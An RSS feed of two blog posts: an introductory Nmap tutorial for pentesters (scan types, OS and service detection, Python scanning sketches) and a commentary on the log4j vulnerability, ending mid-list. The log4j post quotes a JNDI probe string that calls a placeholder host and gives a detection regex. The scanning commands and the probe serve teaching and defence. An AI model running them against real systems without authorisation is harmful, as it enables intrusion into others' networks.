<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Andy Kofod</title>
    <description>The latest articles on Forem by Andy Kofod (@akofod).</description>
    <link>https://forem.com/akofod</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F212425%2Fc454db9c-1088-4208-947a-798847c00ee8.jpeg</url>
      <title>Forem: Andy Kofod</title>
      <link>https://forem.com/akofod</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/akofod"/>
    <language>en</language>
    <item>
      <title>Getting Started with Nmap for Pentesters</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Dec 2021 20:47:09 +0000</pubDate>
      <link>https://forem.com/leading-edje/getting-started-with-nmap-for-pentesters-59af</link>
      <guid>https://forem.com/leading-edje/getting-started-with-nmap-for-pentesters-59af</guid>
      <description>&lt;p&gt;Nmap is an incredibly powerful, open-source network scanning and mapping tool that can be used to determine what hosts are available on a network, what services those hosts are running, what operating system they're running, if there is any filtering or firewalls in use, and much more. It's used by system and network admins for various tasks such as monitoring host or service uptime, managing service upgrades, and network inventory. And while it's great for these type of administrative tasks, it's also used heavily by security auditors and pentesters for enumerating a network. It's these users that we'll focus on in this article.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is "enumeration"?
&lt;/h2&gt;

&lt;p&gt;Enumeration is simply the process of gathering as much information as possible about your target. It's one of the first, and most important, steps in a penetration test. For this reason, Nmap is one of the first tools a pentester needs to learn. Using Nmap, you can identify which hosts are active on a network, which operating systems those hosts are running, which services are running on those hosts and on which ports, and what versions of the software are running for those services. Using this information, you can begin researching potential vulnerabilities on the running software, and attempt to locate exploits that you may be able to use against the targets.&lt;/p&gt;

&lt;p&gt;It's important to note that enumeration is not a one-time task during a pentest. It's something you'll do over and over again as you exploit vulnerabilities and gain access to new parts of a network. Nmap automates this very tedious work, but it can be an intimidating tool for new users, so let's take a look at the basics of how you might use Nmap in a penetration test.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Nmap Syntax
&lt;/h2&gt;

&lt;p&gt;At the most basic level, the Nmap syntax looks something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap [Scan Type...] [Options] {target specification}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Where &lt;code&gt;Scan Type&lt;/code&gt; is a flag that tells Nmap which type of scan you want to run, and &lt;code&gt;Options&lt;/code&gt; control other behaviors you want Nmap to use during the scan, such as which ports to scan or where to direct the output. The &lt;code&gt;target specification&lt;/code&gt; tells Nmap what target(s) you want to scan. This can be specified as an IP address (&lt;code&gt;10.10.10.10&lt;/code&gt;), as a hostname (&lt;code&gt;example.com&lt;/code&gt;), or as a range of IP addresses using CIDR notation (&lt;code&gt;192.168.10.0/24&lt;/code&gt;) or octet range addressing (&lt;code&gt;192.168.3-5,7.1&lt;/code&gt;). Multiple targets can be specified, using any combination of the specification styles. This can get confusing if you're not familiar with network addressing, so check out the Nmap reference guide on &lt;a href="https://nmap.org/book/man-target-specification.html" rel="noopener noreferrer"&gt;target specification&lt;/a&gt; if you need more guidance.&lt;/p&gt;
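&lt;p&gt;To see concretely what a CIDR target expands to, here's a short Python sketch using the standard &lt;code&gt;ipaddress&lt;/code&gt; module (just an illustration of the notation; Nmap does this expansion internally):&lt;/p&gt;

```python
import ipaddress

# Expand the CIDR target 192.168.10.0/24 into the addresses Nmap would consider.
net = ipaddress.ip_network("192.168.10.0/24")

print(net.num_addresses)  # 256 total addresses in the block

# hosts() excludes the network and broadcast addresses
hosts = list(net.hosts())
print(hosts[0], hosts[-1])  # 192.168.10.1 192.168.10.254
```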

&lt;h2&gt;
  
  
  Basic Network Scanning
&lt;/h2&gt;

&lt;p&gt;Depending on the scope of your test, one of the first scans you might want to run is a simple network scan, or ping scan. If you're working with a range of IP addresses, you'll want to start out by mapping the network and identifying which IP addresses have an active host that you could target further. Nmap is very powerful, but it can also be quite slow depending on the type of scan you're running. We don't want to jump straight into port scanning before we even know if a host is active, so we'll start with a scan that is often referred to as a "ping sweep". This type of scan, initiated with the &lt;code&gt;-sn&lt;/code&gt; flag, will send ICMP ping packets to each host in the target range and report which hosts respond. For example, if we want to check all of the hosts in the &lt;code&gt;192.168.0.x&lt;/code&gt; network we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sn 192.168.0.1-254
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Alternatively, we could achieve the same results using CIDR notation&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sn 192.168.0.0/24
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;-sn&lt;/code&gt; flag tells Nmap that we want to skip port scanning for this run. There are a lot of other options available for host scanning, but this is the simplest form. For more information on the other options available, check out the &lt;a href="https://nmap.org/book/man-host-discovery.html" rel="noopener noreferrer"&gt;host discovery&lt;/a&gt; section of the reference guide.&lt;/p&gt;
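&lt;p&gt;To build intuition for what a ping sweep automates, here's a rough Python sketch of a serial sweep (this is not how Nmap is implemented; Nmap probes hosts in parallel and mixes in other probe types, which is why it's so much faster):&lt;/p&gt;

```python
import subprocess

def ping_sweep(hosts, timeout=1):
    """Rough sketch of a ping sweep: one ICMP echo request per host, serially."""
    alive = []
    for host in hosts:
        # -c 1: send a single echo request; -W: per-host timeout (Linux ping syntax)
        result = subprocess.run(
            ["ping", "-c", "1", "-W", str(timeout), host],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        if result.returncode == 0:
            alive.append(host)
    return alive

# Sweeping the same range as the Nmap command above:
# ping_sweep([f"192.168.0.{i}" for i in range(1, 255)])
```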

&lt;h2&gt;
  
  
  Port Scanning
&lt;/h2&gt;

&lt;p&gt;Now that we know which hosts are responding, we're ready to start scanning to see which ports are open. There are three basic scan types that are used most often for a port scan. We won't go into great detail on how each of them works here, but here's a quick overview of each:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. TCP Connect Scan &lt;code&gt;-sT&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;In this type of scan, Nmap will attempt to connect to each port using the standard TCP three-way handshake. If the port responds with a SYN/ACK packet, the port is marked as open, and Nmap completes the handshake. On the other hand, if the port responds with an RST packet, Nmap will record the port as closed and move on. A major drawback with this type of scan is that it's common for firewalls to simply drop incoming TCP requests and not send any response at all. In this case, Nmap will mark the port as filtered. An even bigger issue is if the firewall is configured to respond to TCP requests with an RST packet even when the port is actually open. This is fairly easy to implement and can cause erroneous scan results. For this reason, you may want to run several different types of scans during enumeration to get the most accurate results possible. For example, if we wanted to run a TCP connect scan against a host at &lt;code&gt;10.10.63.97&lt;/code&gt; we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sT 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since we didn't specify which ports to scan, Nmap will default to the top 1,000 ports for that protocol. Our output might look something like this&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1pi549w7fk8vk0zn77zx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1pi549w7fk8vk0zn77zx.png" alt="TCP Scan Results"&gt;&lt;/a&gt;&lt;br&gt;
From our results we can see that there are five ports open on this host, and get some basic information about the service running on each.&lt;/p&gt;
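&lt;p&gt;The core idea of the connect scan can be sketched with nothing but standard sockets, since the operating system performs the full handshake for us (a simplified sketch, not Nmap's actual implementation):&lt;/p&gt;

```python
import socket

def connect_scan(host, ports, timeout=0.5):
    """Sketch of a TCP connect scan: a completed connect() means the port is open."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the three-way handshake completes
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

&lt;p&gt;Because every open port sees a fully established connection, services and firewalls can easily log these probes, which is part of why the stealthier scan types exist.&lt;/p&gt;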
&lt;h3&gt;
  
  
  2. SYN Scan &lt;code&gt;-sS&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;The SYN scan is also sometimes known as a "Stealth Scan" or a "Half-Open Scan". This is the default scan used by Nmap and the most popular, because it's not as easy to detect as the TCP connect scan and provides a reliable differentiation between open, closed, and filtered ports. With a SYN scan, Nmap still uses the TCP protocol, but rather than completing the three-way handshake, it sends an RST packet once the server responds with a SYN/ACK packet. This is considered a stealthier scan because, by not completing the handshake, we may avoid having our scan logged on some systems. It also makes the scan much faster, since Nmap doesn't need to complete the full three-way handshake. One important note about SYN scans is that they must be run by a user with &lt;code&gt;sudo&lt;/code&gt; privileges, since crafting the raw packets requires root access. So, if we want to run a scan against &lt;code&gt;10.10.63.97&lt;/code&gt;, as we did with the TCP connect scan, we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we see results very similar to the TCP scan&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyaqieh1dweav6cctlcs5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyaqieh1dweav6cctlcs5.png" alt="Syn Scan Results"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  3. UDP Scan &lt;code&gt;-sU&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;The final type of port scan we'll talk about is the UDP Scan. This type of scan is different from the others because it utilizes the UDP protocol instead of the TCP protocol. While TCP is far more prevalent, there are still a lot of services that run on UDP and vulnerabilities in these services are quite common. There are several drawbacks to the UDP scan, one of the main ones being that it is significantly slower than the other types of scans. Even so, it's a good practice to include this type of scan in your enumeration, since it could identify open ports that weren't reported by the other types of scans. Again targeting the server at &lt;code&gt;10.10.63.97&lt;/code&gt;, we would use the following command to run a UDP scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sU 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And our results may look something like this&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngj254ckv9wqsxw3u76r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngj254ckv9wqsxw3u76r.png" alt="UDP Scan Results"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are several other types of scans available in Nmap such as the NULL, FIN and Xmas scans. They aren't as common as the main three discussed here, but they may provide some benefits in specific situations, such as a need to avoid firewall protections. For more information on the types of scans available in Nmap check out the &lt;a href="https://nmap.org/book/man-port-scanning-techniques.html" rel="noopener noreferrer"&gt;port scanning techniques&lt;/a&gt; section of the reference guide.&lt;/p&gt;
&lt;h2&gt;
  
  
  Service and OS Version Discovery
&lt;/h2&gt;

&lt;p&gt;While the simple scans above can help us identify which ports are open, and provide some basic information about services running on the host, it's not quite enough for us to begin researching vulnerabilities. For that we need to add a couple of option flags to our commands.&lt;/p&gt;

&lt;p&gt;First, we'll attempt to discover the operating system that's running on the host. This is achieved with the &lt;code&gt;-O&lt;/code&gt; option, which tells Nmap to use TCP/IP stack fingerprinting to try to identify the OS. For this we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS -O 10.10.76.119
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzn9thto105mplgsk3xkv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzn9thto105mplgsk3xkv.png" alt="Operating System Detection Results"&gt;&lt;/a&gt;&lt;br&gt;
As you can see from the results, we're still getting the basic scan information identifying open ports, but below that we also get details about the operating system that Nmap believes the server is running. In this case, Linux 3.13. Now we've got something to work with. Using this OS information, we can search &lt;a href="https://www.exploit-db.com/" rel="noopener noreferrer"&gt;Exploit DB&lt;/a&gt; for potential vulnerabilities.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0iludqimig3izgpo4nu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0iludqimig3izgpo4nu.png" alt="Exploit DB OS Results"&gt;&lt;/a&gt;&lt;br&gt;
From this search we can see that the OS running on the host has several potential local privilege escalation vulnerabilities.&lt;/p&gt;

&lt;p&gt;This is great, but privilege escalation vulnerabilities don't do us a lot of good until we get a foothold on the server. Next, let's try to get some more information on the services that the host is running. We'll do this with the &lt;code&gt;-sV&lt;/code&gt; option.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS -sV 10.10.76.119
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhc8slukm1z1y4amubaix.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhc8slukm1z1y4amubaix.png" alt="Image description"&gt;&lt;/a&gt;&lt;br&gt;
Now we can see a lot more details about the services running on the host. For instance, we already knew that &lt;code&gt;ssh&lt;/code&gt; was running on port &lt;code&gt;22&lt;/code&gt;, but we now know that it's running OpenSSH version 7.2p2. Let's take this information back to Exploit DB.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fofa66w3x6yoxvnkhagjt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fofa66w3x6yoxvnkhagjt.png" alt="Image description"&gt;&lt;/a&gt;&lt;br&gt;
Okay, it looks like this version of OpenSSH may have a username enumeration vulnerability. We'll keep doing the same thing for all of the identified services. Even if we can't use an exploit right away, we'll make a note of it. We may be able to come back and use it later on in our tests. Check out the reference pages for &lt;a href="https://nmap.org/book/man-os-detection.html" rel="noopener noreferrer"&gt;OS detection&lt;/a&gt; and &lt;a href="https://nmap.org/book/man-version-detection.html" rel="noopener noreferrer"&gt;service and version detection&lt;/a&gt; for more details on these options.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;This just barely scratches the surface of Nmap's capabilities. There is so much more to this tool, especially once you get into the scripting engine (but I'll save that for a future article). If you want to try out these skills, check out sites like &lt;a href="https://tryhackme.com/" rel="noopener noreferrer"&gt;TryHackMe&lt;/a&gt; or &lt;a href="https://www.hackthebox.com/" rel="noopener noreferrer"&gt;HackTheBox&lt;/a&gt;, where you can find servers to practice on. For now, you should have enough knowledge to get started with network enumeration in your pentests. Good luck!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>networking</category>
    </item>
    <item>
      <title>The Fallout From log4j and What We Can Learn From It</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Dec 2021 08:30:40 +0000</pubDate>
      <link>https://forem.com/leading-edje/the-fallout-from-log4j-and-what-we-can-learn-from-it-2o92</link>
      <guid>https://forem.com/leading-edje/the-fallout-from-log4j-and-what-we-can-learn-from-it-2o92</guid>
<description>&lt;p&gt;By now most people who work in software or IT have heard about the vulnerability in log4j that was disclosed last week. This has resulted in a high-stakes race between IT teams trying to update and patch their vulnerable systems and hackers trying to find easy targets to exploit with the new vulnerability. The resulting fallout has brought up a lot of very interesting issues that bear discussion.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Details, Briefly
&lt;/h2&gt;

&lt;p&gt;If you're not familiar, &lt;a href="https://logging.apache.org/log4j/2.x/index.html"&gt;log4j&lt;/a&gt; is an open-source logging framework for Java that's maintained by Apache. It's one of the most popular dependencies downloaded from the Maven repository. Released in January of 2001, it's nearly as old as Java itself, and is used in thousands of projects around the world.&lt;/p&gt;

&lt;p&gt;The vulnerability itself has been reported on pretty heavily over the past few days, so I'll just summarize quickly. If an application logs any information directly from the user, such as chat messages, username or email changes, etc., an attacker could potentially format a message that would use the Java Naming and Directory Interface (JNDI) to load and execute code from a remote server. This type of vulnerability is commonly known as a Remote Code Execution (RCE) vulnerability.&lt;/p&gt;

&lt;h2&gt;
  
  
  So What's the Big Deal?
&lt;/h2&gt;

&lt;p&gt;RCE vulnerabilities are certainly not a rare occurrence. A quick search of the CVE database shows at least 100 other vulnerabilities reported this year that mention RCEs, so why is the log4j vulnerability getting so much attention?&lt;/p&gt;

&lt;p&gt;That's what makes this whole situation so interesting. First of all, it's an &lt;em&gt;extremely&lt;/em&gt; popular library that's used by thousands of projects from the smallest hobby web apps, to huge enterprise solutions. It's used in the &lt;a href="https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/"&gt;servers of Minecraft&lt;/a&gt;, one of the best-selling video games of all time. It's a dependency of &lt;a href="https://www.crn.com/slide-shows/security/10-technology-vendors-affected-by-the-log4j-vulnerability"&gt;numerous, major, software vendors&lt;/a&gt; including AWS, IBM, Cisco, Okta, and VMWare.&lt;/p&gt;

&lt;p&gt;This alone makes it a significant issue, but what makes it even worse is how easy this vulnerability is to exploit. A correctly formatted message and a remote server to host the attack payload are all that's needed to execute code on the log4j host server. The following is an example of the &lt;a href="https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"&gt;messages being seen by Cloudflare&lt;/a&gt; following the disclosure of the vulnerability:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;${jndi:ldap://x.x.x.x/#Touch}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a simple example that's being used to scan for potential targets. If a server is vulnerable, a request will be sent to &lt;code&gt;x.x.x.x/#Touch&lt;/code&gt;, letting the attacker know that the target is vulnerable to the attack. A follow-up message can then be sent to exploit the vulnerability. For more details on how the vulnerability works, check out &lt;a href="https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"&gt;this excellent write-up from Cloudflare&lt;/a&gt;.&lt;/p&gt;
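&lt;p&gt;The kind of pattern matching that firewall and WAF rules relied on after the disclosure can be sketched naively in Python (illustrative only; attackers quickly found obfuscations, such as nested lookups, that defeat this sort of simple matching):&lt;/p&gt;

```python
import re

# Naive check for the basic exploit string format. Real-world bypasses
# (e.g. nested lookups like ${${lower:j}ndi:...}) evade this easily.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(message):
    return bool(JNDI_PATTERN.search(message))

print(looks_like_log4shell("${jndi:ldap://x.x.x.x/#Touch}"))   # True
print(looks_like_log4shell("user changed email to a@b.com"))   # False
```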

&lt;h2&gt;
  
  
  The Disclosure Conundrum
&lt;/h2&gt;

&lt;p&gt;This brings us to the first thing I found interesting about this situation. log4j is a pretty old framework, and this bug is not new. According to the Cloudflare article referenced above, it was introduced in 2013. Apparently, it went unnoticed until it was &lt;a href="https://www.crn.com/news/security/log4j-exploit-is-a-fukushima-moment-for-cybersecurity-tenable-cto"&gt;first disclosed&lt;/a&gt; to Apache on November 24th by security researchers at Alibaba. It wasn't publicly disclosed until December 9th, after Apache had time to create release 2.15.0 to address the issue. And the race was on.&lt;/p&gt;

&lt;p&gt;IT teams around the world immediately began rushing to update their servers with the fixed release. At the same time, attackers started scanning the internet for vulnerable servers. &lt;a href="https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"&gt;Cloudflare reports&lt;/a&gt; that they began seeing a ramp up of blocked attacks the day after the disclosure, peaking at 20,000 requests per minute, with between 200 and 400 IPs attacking at any given time.&lt;/p&gt;

&lt;p&gt;And that's the conundrum. Disclosing a vulnerability, especially one that's this easy to exploit and this widespread, is bound to trigger this kind of race between attackers and defenders, and it's interesting to watch. It seems pretty clear that the disclosure was news to attackers as well. Various reports from security researchers have been tracking the progress of organized groups on the dark web as they rush to develop new exploits. &lt;br&gt;
&lt;/p&gt;
&lt;blockquote class="ltag__twitter-tweet"&gt;

  &lt;div class="ltag__twitter-tweet__main"&gt;
    &lt;div class="ltag__twitter-tweet__header"&gt;
      &lt;img class="ltag__twitter-tweet__profile-image" src="https://res.cloudinary.com/practicaldev/image/fetch/s--YJoKRnXV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://pbs.twimg.com/profile_images/631923531719151616/IpTXHz_t_normal.jpg" alt="Greg Linares profile image"&gt;
      &lt;div class="ltag__twitter-tweet__full-name"&gt;
        Greg Linares
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__username"&gt;
        @laughing_mantis
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__twitter-logo"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ir1kO05j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-f95605061196010f91e64806688390eb1a4dbc9e913682e043eb8b1e06ca484f.svg" alt="twitter logo"&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__body"&gt;
      Honestly I'm kinda surprised it isn't finished yet, but I have seen at least 3 groups (Eastern euro, .ru and .cn) that are investigating options to do this.&lt;br&gt;&lt;br&gt;Goals appear varied: financial gain via extortion as well as selling access to compromised hosts to RaaS groups
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__date"&gt;
23:02 - 12 Dec 2021
    &lt;/div&gt;


    &lt;div class="ltag__twitter-tweet__actions"&gt;
      &lt;a href="https://twitter.com/intent/tweet?in_reply_to=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fFnoeFxk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-reply-action-238fe0a37991706a6880ed13941c3efd6b371e4aefe288fe8e0db85250708bc4.svg" alt="Twitter reply action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/retweet?tweet_id=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--k6dcrOn8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-retweet-action-632c83532a4e7de573c5c08dbb090ee18b348b13e2793175fea914827bc42046.svg" alt="Twitter retweet action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/like?tweet_id=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SRQc9lOp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-like-action-1ea89f4b87c7d37465b0eb78d51fcb7fe6c03a089805d7ea014ba71365be5171.svg" alt="Twitter like action"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/blockquote&gt;
&lt;br&gt;
There's a small window of time for them to hit the "low-hanging fruit" before those systems are patched. There will of course continue to be organizations that don't patch right away, either because they can't (due to complexity, backwards compatibility, etc.) or because they don't know they have a vulnerable dependency in their codebase.

&lt;p&gt;Now, I'm not suggesting that there was anything wrong with the disclosure. Alibaba's team did the right thing by reporting it to the log4j team, and giving them time to create a patch before disclosing it publicly. This is exactly how responsible disclosures should go. Maybe it's because this vulnerability has gotten so much attention, but I've found it very interesting to watch this "race" take place in real-time. I think the real lesson here is that organizations need to be prepared for this type of event. Know your dependencies, and know how you're going to upgrade them when you need to, especially when time is not on your side. If your systems are too complex to make this type of upgrade easily, it may be time to re-evaluate your architecture.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Paying for Open-Source Debate
&lt;/h2&gt;

&lt;p&gt;Another interesting thing to come out of this incident is the re-emergence of the old arguments about whether enterprise companies should be paying to support the open-source projects they depend on. I always find this debate interesting, and I don't have a strong opinion on the issue, but I see merit to both sides.&lt;/p&gt;

&lt;p&gt;In one camp, you have those who argue that these large enterprise organizations are taking advantage of open-source projects without giving any support to the developers. This group argues that if the developers were paid for their work maintaining open-source projects, they'd have more time to dedicate to preventing vulnerabilities, as well as adding new features. On the other hand, you have some who claim, &lt;a href="https://crawshaw.io/blog/log4j"&gt;as David Crawshaw points out&lt;/a&gt;, that paying for open-source software probably wouldn't have helped to prevent this bug. In fact, it may be these enterprise users that kept this bug from being fixed sooner. &lt;a href="https://twitter.com/yazicivo/status/1469349956880408583?s=21"&gt;According to one of the maintainers&lt;/a&gt; of log4j, the team didn't like this feature, but wasn't able to remove it due to backward compatibility concerns (we'll come back to this in a minute).&lt;/p&gt;

&lt;p&gt;I love the idea of open-source software, and it would be great if its maintainers could get paid to keep it going, but how does that help to prevent vulnerabilities like this from sneaking in? I think it's clear from the numerous vulnerabilities found in paid software that this kind of bug can easily sneak in, paid or not, but this topic seems to spring up any time a vulnerability is found in a widely used open-source project. I don't have an answer for the paid vs. open-source debate, but I will say this: if you're using third-party software in your applications, it's on you to make sure you understand what it's doing and have reviewed the code for vulnerabilities. If you can't confidently say that your software, including its dependencies, is secure, then you shouldn't be shipping it.&lt;/p&gt;
&lt;h2&gt;
  
  
  Back to the Backward Compatibility
&lt;/h2&gt;

&lt;p&gt;Okay, circling back to the thing I mentioned a minute ago about backward compatibility. This is another interesting aspect of this incident. It appears that the maintainers were at least aware that the JNDI plugin was a potential problem, but their requirement to maintain backward compatibility prevented them from removing it. I understand the desire to maintain backward compatibility, and I'm sure this is a major concern given the number of users the log4j library has, but I also believe that open-source teams need to feel empowered to do what needs to be done, even if it means a little extra work for their users. This is especially true for security issues. Yes, removing the JNDI feature may have broken the library for some users. There would have been some grumbling as developers figured out how to modify their implementations to work with the new version. But those same developers would probably have preferred that over finding out on a Friday afternoon that they have a critical security vulnerability that has to be fixed right now.&lt;/p&gt;
&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;It's been interesting to watch this event unfold, and it's got me thinking about a lot of different issues. I'll leave you with this:&lt;/p&gt;

&lt;ul&gt;
